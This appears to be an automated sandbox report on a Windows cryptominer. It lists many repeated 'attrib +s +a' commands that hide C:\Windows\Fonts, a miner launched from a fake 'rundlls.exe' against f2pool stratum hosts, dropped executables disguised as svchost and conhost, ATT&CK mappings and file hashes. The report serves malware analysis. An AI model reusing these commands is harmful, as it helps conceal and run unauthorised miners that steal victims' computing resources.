C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\rundlls.exe"rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Registry Run Keys / Startup Folder
1Hidden Files and Directories
2Modify Existing Service
1Defense Evasion
Indicator Removal on Host
1Modify Registry
2Hidden Files and Directories
2Impair Defenses
1File Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tem.vbsFilesize
215B
MD5535a478cc80a0fbbf990eed73f8788bb
SHA1459479dadaf00f3fa0de78f640c34dd426fd61aa
SHA256323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51
SHA5123c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1
-
C:\Windows\Fonts\conhost.exeFilesize
2.9MB
MD51b9583c6c3eab1da961aec9e42bfbcb8
SHA1c60f85fa6bcc463b3d38b7714916b241f2139650
SHA2566260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA5120bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
C:\Windows\Fonts\rundlls.exeFilesize
5.2MB
MD5ed499b3a95e11ecf57e5131cd82c2a14
SHA17f37e85068457497f5f34e73edde4963694cfc19
SHA256c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\TEMP\csonhost.batFilesize
6KB
MD59da29265b1391c18f00c959c64b3fb65
SHA1dee2f9ded1706933f452ebcd2d5ccd8818af713e
SHA256fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824
SHA5126d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2
-
